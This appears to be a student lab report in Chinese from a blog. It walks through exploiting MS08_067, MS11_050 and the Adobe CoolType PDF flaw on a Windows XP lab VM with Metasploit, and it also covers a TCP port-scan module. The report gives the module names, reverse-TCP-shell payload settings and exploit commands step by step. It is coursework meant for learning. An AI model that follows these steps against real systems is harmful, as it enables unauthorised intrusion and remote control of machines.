实践报告

MS08_067漏洞渗透攻击实践

  • 前期准备

    kali和winxp要ping通

  • kali开启msfconsole;

同时在这里可以看到目前可攻击载荷个数一共是471个,也可以看到其他攻击的数量如图。

  • 用命令search ms08_067,查找渗透模块:

  • 输入命令use exploit/windows/smb/ms08_067_netapi 后,就可以使用这个模块啦

  • show target可以看到可攻击靶机的操作系统型号

    show payload可以看到有效的攻击载荷 为了和其他同学有所区分 我选择“windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager”,使用反向TCP shell,这个有效载荷会执行cmd.exe并通过连接回传,达到“远程访问”的目的。攻击效果中等难度



  • 使用命令set payload windows/shell/reverse_tcp设置有关参数,并查看

  • 确认无误后,用exploit命令开始攻击,成功获取权限

  • 可以在winxp C盘下新建一个带有学号20145201的文件夹,之后再kali中查看,该文件夹存在

MS11_050漏洞渗透攻击实践

-和之前一样kali攻击机和winxp靶机要ping通(真心是通的..不截图了);

  • kali中开启msfconsole;

  • 因为这次做的是ms11_050漏洞攻击,命令use windows/browser/ms11_050_mshtml_cobjectelement,使用该模块;



    info即可查看关于该漏洞的信息

  • 设置对应的载荷set payload windows/shell_reverese_tcp;

  • exploit,靶机访问的ip地址如图:

  • 靶机IE浏览器输入网址,出现了一些奇怪的符号之后建立成了~地址根据我刚刚的设置应该是: htt://192.168.134.129/lzx

  • 之后简单粗暴获取权限..

Adobe阅读器渗透攻击

  • kali攻击机和winxp靶机要ping通;

  • 由于之后生成的pdf在隐藏文件夹下,故在kali下打开显示隐藏文件,如下图:

  • kali开启msfconsole;

  • use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。

  • 用命令set payload windows/shell_reverse_tcp和之前一样设置参数;

    和之前唯一不同的是,用命令set FILENAME 20145201.pdf来设置生成pdf的文件名

  • 用命令exploit,生成pdf文件,根据显示的位置找到pdf文件,并复制到靶机里;

  • 用命令back退出当前模块,并用命令use exploit/multi/handler建立一个监听模块,参数设置要和之前的一样;



  • exploit后,在xp中打开pdf,结果如下:



    可以看到已经获取的靶机权限,20145201.pdf的文件是存在的~

  • 在靶机中用命令netstat -an,可以看到kali攻击机和靶机之间是有tcp连接的。

辅助模块应用(auxiliary/scanner/portscan/tcp)

  • 创建msf所需的数据库

    之前我们开启msf时下面总会出现一个红色的小减号,原来是因为没有和数据库键连接,于是首先我们要手动建立一个数据库...

    使用命令来实现:
service postgresql start
msfdb start

  • 之后开启msf

  • 在查看可以应用的辅助模块后,我选择使用auxiliary/scanner/portscan/tcp模块,用来扫描靶机的TCP端口使用情况;

    执行命令use auxiliary/scanner/portscan/tcp进入并使用模块;

  • show options查看需要设置的参数信息,设置winxp的ip为RHOST



  • run开启扫描,可以看到在winxp靶机上所有tcp端口的使用情况(这时扫描还没完成..我先截了个图~)

问题回答

用自己的话解释什么是exploit,payload,encode.

  • exploit即为漏洞利用,是一个攻击过程,我们做实验时一些列步骤之后,最后一步就是exploit。
  • payload载荷 顾名思义“载”的是我们执行攻击利用的代码等。
  • encode编码 可以是对代码的一种编码 来防止之前的恶意代码被识破。

实验体会

这次实验是msf基本应用,利用各种系统的漏洞来进行攻击。做下来,感觉基本的套路都是一样的,弄明白其中一个模块后,其他的都根据options来一一设置就好,感觉很高大上啊。当然电脑卡不卡决定了这次实验所花的时间(๑•ᴗ•๑)然后就是,每次我电脑开机后360安全卫士总是在右下角冒出红色框框来让我下载安装什么补丁来修复漏洞,这令我很纠结啊,因为感觉会捆绑一些别的东西,在我电脑上神不知鬼不觉的开一些后门弄几个恶意代码进来之类的...于是每次选的都是放弃修复...不过 现在好像有点改变主意了

最新文章

  1. php常用数组函数小结
  2. MySQL存储IP地址操作
  3. Oracle在中文环境下出现乱码解决办法
  4. NOIP2014感想
  5. jQuery中position()与offset()区别
  6. Java 征途:行者的地图 (转)
  7. topcoder SRM 593 DIV2 WolfDelaymaster
  8. SQL 比较时间大小
  9. 深入学习JavaScript对象
  10. bzoj1179
  11. Netbeans搭建Android环境
  12. nginx 引入外部文件
  13. CodeForces 912d fishes(优先队列+期望)
  14. http协议状态码及其意义
  15. servlet 上下文
  16. Spring遇到的问题合集
  17. 20181223 python 使用Beautiful Soup
  18. CentOS-6.6安装配置Tomcat-7
  19. Python3:if __name__ == '__main__' 详解
  20. CF23 E. Tree 树形dp+高精度

热门文章

  1. 《C#高级编程》学习笔记------抗变和协变
  2. MyBatis——Mapper XML 文件
  3. 对规范中每个模块只允许一个id的理解
  4. nodejs 环境搭建
  5. JS判断当前是否是IE浏览器,并返回时IE几?
  6. 170721、springboot编程之注解(annotation)列表
  7. ZOJ 3537 Cake(凸包判定+区间DP)
  8. 不走标准路的微软:少一个斜杠的URI Path
  9. Dubbo学习记录
  10. MYSQL查看数据表最后更新时间